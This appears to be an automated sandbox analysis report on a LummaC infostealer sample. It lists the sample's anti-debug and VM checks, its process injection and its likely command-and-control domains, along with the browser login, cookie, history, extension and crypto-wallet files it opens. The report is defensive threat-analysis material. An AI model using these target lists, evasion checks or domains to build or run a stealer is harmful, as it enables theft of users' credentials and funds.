Source: C:\Users\user\Desktop\fuk7RfLrD3.exe TID: 7912	Thread sleep count: 9017 > 30	Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe TID: 7912	Thread sleep time: -6510274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe TID: 7956	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_004389E2 FindFirstFileExW,

2_2_004389E2

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.0000000000703000.00000004.00000020.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000002.1712355777.0000000000719000.00000004.00000020.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: fuk7RfLrD3.exe, 00000002.00000002.3827842898.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: D1F3.tmp.exe, 00000004.00000003.1458804688.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: D1F3.tmp.exe, 00000004.00000003.1459178006.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

API call chain: ExitProcess graph end node

graph_4-26146

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Code function: 4_2_004402C0 LdrInitializeThunk,

4_2_004402C0

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 0_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00401000

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

0_2_00407565

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00670042 push dword ptr fs:[00000030h]	0_2_00670042
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006A07EF mov eax, dword ptr fs:[00000030h]	0_2_006A07EF
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006F905B push dword ptr fs:[00000030h]	0_2_006F905B
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0042FE4F mov eax, dword ptr fs:[00000030h]	2_2_0042FE4F
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00540083 push dword ptr fs:[00000030h]	4_2_00540083
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D092B mov eax, dword ptr fs:[00000030h]	4_2_020D092B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D0D90 mov eax, dword ptr fs:[00000030h]	4_2_020D0D90

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_0043BBB1 GetProcessHeap,

2_2_0043BBB1

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00401000
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00402595 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00402595
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0040929E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040929E
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00404AB2 SetUnhandledExceptionFilter,	0_2_00404AB2
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0042A3C3
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004104C3
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00410656 SetUnhandledExceptionFilter,	2_2_00410656
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040F907

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

0_2_00670110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Memory written: C:\Users\user\Desktop\fuk7RfLrD3.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: D1F3.tmp.exe	String found in binary or memory: robinsharez.shop
Source: D1F3.tmp.exe	String found in binary or memory: handscreamny.shop
Source: D1F3.tmp.exe	String found in binary or memory: chipdonkeruz.shop
Source: D1F3.tmp.exe	String found in binary or memory: versersleep.shop
Source: D1F3.tmp.exe	String found in binary or memory: crowdwarek.shop
Source: D1F3.tmp.exe	String found in binary or memory: apporholis.shop
Source: D1F3.tmp.exe	String found in binary or memory: femalsabler.shop
Source: D1F3.tmp.exe	String found in binary or memory: soundtappysk.shop
Source: D1F3.tmp.exe	String found in binary or memory: skidjazzyric.click

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process created: C:\Users\user\Desktop\fuk7RfLrD3.exe "C:\Users\user\Desktop\fuk7RfLrD3.exe"			Jump to behavior
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Process created: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe"			Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 0_2_0068110B cpuid

0_2_0068110B

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetLocaleInfoA,	0_2_00409573
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetLocaleInfoW,	2_2_004351B0
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: EnumSystemLocalesW,	2_2_0043B272
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: EnumSystemLocalesW,	2_2_0043B2BD
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: EnumSystemLocalesW,	2_2_0043B358
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_0043B3E5
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetLocaleInfoW,	2_2_0043B635
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0043B75E
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetLocaleInfoW,	2_2_0043B865
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0043B932
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: EnumSystemLocalesW,	2_2_00434DBD
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_0043AFFA

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 0_2_00405927 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00405927

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

2_2_004163DA

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: D1F3.tmp.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.0000000000725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.0000000000725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
